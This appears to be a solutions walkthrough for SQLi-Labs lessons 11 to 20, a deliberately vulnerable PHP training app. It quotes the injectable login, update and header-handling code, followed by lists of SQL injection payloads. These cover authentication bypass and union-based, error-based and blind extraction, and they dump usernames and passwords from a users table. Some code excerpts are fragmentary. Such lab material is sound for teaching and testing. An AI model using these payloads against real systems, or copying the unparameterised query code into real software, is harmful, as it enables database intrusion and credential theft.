SQLi-Labs Less 11-20
Less-11 POST - Error based - Single Quotes - String
Code:
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname=$_POST['uname'];
$passwd=$_POST['passwd'];
$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
if($row)
{
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
}
else
{
//echo "Try again looser";
print_r(mysql_error());
Code:
' or 1=1 --
' or 1=2 union select user(),database() --
' or 1=2 union select 1,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 LIMIT 3,1 --
' or 1=2 union select 1,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 1,1 --
' or 1=2 union select 1,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 2,1 --
' or 1=2 union select username,password from security.users LIMIT 0,1 --
Less-12 POST - Error based - Double Quotes - String - with twist
Code:
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname=$_POST['uname'];
$passwd=$_POST['passwd'];
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
if($row)
{
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
}
else
{
//echo "Try again looser";
print_r(mysql_error());
Code:
") or 1=1 --
") or 1=2 union select user(),database() --
") or 1=2 union select 1,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 LIMIT 3,1 --
") or 1=2 union select 1,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 1,1 --
") or 1=2 union select 1,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 2,1 --
") or 1=2 union select username,password from security.users LIMIT 0,1 --
Less-13 POST - Double injection - Single Quotes - String - with twist
Code:
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname=$_POST['uname'];
$passwd=$_POST['passwd'];
@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
if($row)
{
//echo " You Have successfully logged in " ;
//echo 'Your Login name:'. $row['username'];
//echo 'Your Password:' .$row['password'];
}
else
{
//echo "Try again looser";
print_r(mysql_error());
Code:
') or 1=1 --
') union select 1 from (select count(*),concat(floor(rand()*2),(select concat(version(),0x22,user(),0x22,database())))a from information_schema.tables group by a)b --
') union select 1 from (select count(*),concat(floor(rand(0)*2),(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,4))a from information_schema.tables group by a)b --
') union select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1))a from information_schema.tables group by a)b --
') union select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1))a from information_schema.tables group by a)b --
') union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(username,0x22,password) from security.users limit 0,1))a from information_schema.tables group by a)b --
Less-14 POST - Double injection - Single Quotes - String - with twist
Code:
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname=$_POST['uname'];
$passwd=$_POST['passwd'];
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
if($row)
{
//echo " You Have successfully logged in " ;
//echo 'Your Login name:'. $row['username'];
//echo 'Your Password:' .$row['password'];
}
else
{
//echo "Try again looser";
print_r(mysql_error());
Code:
" or 1=1 --
" union select 1 from (select count(*),concat(floor(rand()*2),(select concat(version(),0x22,user(),0x22,database())))a from information_schema.tables group by a)b --
" union select 1 from (select count(*),concat(floor(rand(0)*2),(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,4))a from information_schema.tables group by a)b --
" union select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1))a from information_schema.tables group by a)b --
" union select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1))a from information_schema.tables group by a)b --
" union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(username,0x22,password) from security.users limit 0,1))a from information_schema.tables group by a)b --
Less-15 POST - Blind - Boolian/time Based - Single Quotes
Code:
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname=$_POST['uname'];
$passwd=$_POST['passwd'];
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
if($row)
{
//echo " You Have successfully logged in " ;
//echo 'Your Login name:'. $row['username'];
//echo 'Your Password:' .$row['password'];
}
else
{
//echo "Try again looser";
//print_r(mysql_error());
Code:
' or 1=1 --
' or ascii(substr(database(),1,1))=115 --
' or (ascii(substr((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,4),1,1))) = 117 --
' or (ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1 ),1,1))) = 117 --
' or (ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1 ),1,1))) = 112 --
' or (ascii(substr((select username from users limit 0,1),1,1))) = 68 --
' or (ascii(substr((select password from users limit 0,1),1,1))) = 68 --
Less-16 POST - Blind - Boolian/time Based - Double Quotes
Code:
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname=$_POST['uname'];
$passwd=$_POST['passwd'];
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
if($row)
{
//echo " You Have successfully logged in " ;
//echo 'Your Login name:'. $row['username'];
//echo 'Your Password:' .$row['password'];
}
else
{
//echo "Try again looser";
//print_r(mysql_error());
Code:
") or 1=1 --
") or ascii(substr(database(),1,1))=115 --
") or (ascii(substr((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,4),1,1))) = 117 --
") or (ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1 ),1,1))) = 117 --
") or (ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1 ),1,1))) = 112 --
") or (ascii(substr((select username from users limit 0,1),1,1))) = 68 --
") or (ascii(substr((select password from users limit 0,1),1,1))) = 68 --
Less-17 POST - Update Query - Error Based - String
Code:
';
$row1 = $row['username'];
//echo 'Your Login name:'. $row1;
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
mysql_query($update);
echo "
";
if (mysql_error())
{
echo '';
print_r(mysql_error());
echo "";
echo "";
}
else
{
echo '';
//echo " You password has been successfully updated " ;
echo "
";
echo "";
}
echo '';
//echo 'Your Password:' .$row['password'];
echo "";
}
else
{
echo '';
//echo "Bug off you Silly Dumb hacker";
echo "";
echo '';
echo "";
}
}
?>
Code:
UPDATE users SET password = '$passwd' WHERE username='$row1'
' and (select 1 from (select count(*),concat(floor(rand()*2),(select concat(version(),0x22,user(),0x22,database())))a from information_schema.tables group by a)b) --+
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,4))a from information_schema.tables group by a)b) --+
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1))a from information_schema.tables group by a)b) --+
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1))a from information_schema.tables group by a)b) --+
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(username,0x22,password) from security.users limit 0,1))a from information_schema.tables group by a)b) --+
Less-18 POST - Header Injection - Uagent field - Error based
Code:
';
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
mysql_query($insert);
//echo 'Your IP ADDRESS is: ' .$IP;
echo "";
//echo "
";
echo '';
echo 'Your User Agent is: ' .$uagent;
echo "";
echo "
";
print_r(mysql_error());
echo "
";
echo '';
echo "
";
}
else
{
echo '';
//echo "Try again looser";
print_r(mysql_error());
echo "";
echo "";
echo '';
echo "";
}
}
?>
Code:
INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)
' and (select 1 from (select count(*),concat(floor(rand()*2),(select concat(version(),0x22,user(),0x22,database())))a from information_schema.tables group by a)b),'192.168.1.11', 'Dumb') #
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,4))a from information_schema.tables group by a)b),'192.168.1.11', 'Dumb') #
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1))a from information_schema.tables group by a)b),'192.168.1.11', 'Dumb') #
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1))a from information_schema.tables group by a)b),'192.168.1.11', 'Dumb') #
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(username,0x22,password) from security.users limit 0,1))a from information_schema.tables group by a)b),'192.168.1.11', 'Dumb') #
Less-19 POST - Header Injection - Referer field - Error based
Code:
';
$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
mysql_query($insert);
//echo 'Your IP ADDRESS is: ' .$IP;
echo "";
//echo "
";
echo '';
echo 'Your Referer is: ' .$uagent;
echo "";
echo "
";
print_r(mysql_error());
echo "
";
echo '';
echo "
";
}
else
{
echo '';
//echo "Try again looser";
print_r(mysql_error());
echo "";
echo "";
echo '';
echo "";
}
}
?>
Code:
INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')
' and (select 1 from (select count(*),concat(floor(rand()*2),(select concat(version(),0x22,user(),0x22,database())))a from information_schema.tables group by a)b),'192.168.1.11') #
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,4))a from information_schema.tables group by a)b),'192.168.1.11') #
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1))a from information_schema.tables group by a)b),'192.168.1.11') #
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1))a from information_schema.tables group by a)b),'192.168.1.11') #
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(username,0x22,password) from security.users limit 0,1))a from information_schema.tables group by a)b),'192.168.1.11') #
Less-20 POST - Cookie Injection - Uagent field - Error based
Code:
Welcome Dhakkan
Code:
' or 1=1 --
' and ascii(substr(database(),1,1))=115 --
' and (ascii(substr((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,4),1,1))) = 117 --
' and (ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1 ),1,1))) = 117 --
' and (ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1 ),1,1))) = 112 --
' and (ascii(substr((select username from users limit 0,1),1,1))) = 68 --
' and (ascii(substr((select password from users limit 0,1),1,1))) = 68 --